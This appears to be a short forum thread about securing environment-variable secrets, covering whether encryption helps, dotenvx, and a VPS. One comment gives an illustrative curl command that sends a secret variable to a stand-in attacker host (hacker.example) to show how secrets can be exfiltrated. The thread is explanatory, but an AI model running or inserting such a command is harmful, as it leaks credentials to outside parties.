How do you use them if you don't decrypt them? At some point you have to see them in plaintext. Even if they are sensitive and not shown in the UI you can still start an app and curl https://hacker.example/$my_encrypted_var to exfiltrate them.
What's best practice to handle env vars? How do people handle them "securely" without it just being security theater? What tools and workflows are people using?
Exactly. How do you play back the encrypted DVD without having the decryption key right there on the player for everyone to find?
Yeah that's a good point. Dotenvx seems to claim a solution but I'm not smart enough to make sense of it.
However, I do feel now like my sensitive things are better off deployed on a VPS where someone would need an SSH exploit to come at me.